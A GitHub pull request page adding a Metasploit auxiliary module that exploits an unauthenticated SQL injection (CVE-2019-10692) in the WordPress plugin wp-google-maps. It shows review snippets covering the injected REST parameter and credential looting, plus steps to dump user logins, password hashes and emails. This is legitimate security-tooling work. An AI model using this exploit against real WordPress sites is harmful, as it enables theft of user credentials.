-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add wp-google-maps unauthenticated SQL injection (CVE-2019-10692) #11698
Add wp-google-maps unauthenticated SQL injection (CVE-2019-10692) #11698
Conversation
'uri' => normalize_uri(target_uri.path, '/wp-json/wpgmza/v1/markers/'), | ||
'vars_get' => { | ||
'filter' => '{}', | ||
'fields' => sql_query, |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
a very slight improvement would be to change this to "#{sql_query}-- -"
so you don't need to pass the -- -
each time
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Done.
end | ||
|
||
unless credentials.empty? | ||
loot = store_loot("wp_google_maps.http","text/plain", rhost, credentials) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This is most likely debatable, but I'd actually personally prefer storing body
or even res
here and calling it wp_google_maps.json
with the appropriate ctype. Only because we have extra data (i believe) in the query that wasn't printed, may as well store it.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Done.
private_type: :nonreplayable_hash, | ||
status: Metasploit::Model::Login::Status::UNTRIED, | ||
proof: user['user_email'] | ||
}.merge(service_details) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Doesn't look like service_details
was ever define?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Oops, done.
Thanks for the review @h00die 👍 |
PR opened Synacktiv-contrib#2 |
Wp google maps sqli update
Release NotesThe wp_google_maps_sqli auxiliary module exploits a SQL injection in a REST endpoint registered by the WordPress plugin wp-google-maps from v7.11.00 through v7.11.17. |
This auxiliary module aims to exploit an unauthenticated SQL injection in the WordPress module
wp-google-maps
(CVE-2019-10692). The code is heavily based onauxiliary/admin/http/wp_symposium_sql_injection
, but it may require some final tweaking :-)Verification
wp-google-maps
(eg. 7.11.17) and enable itmsfconsole
use auxiliary/admin/http/wp_google_maps_sql_injection
set RHOST <ip>
check
: it should say that the target is vulnerablerun
: it should show the fieldsuser_login
,user_pass
anduser_email
of the wholewp_users
table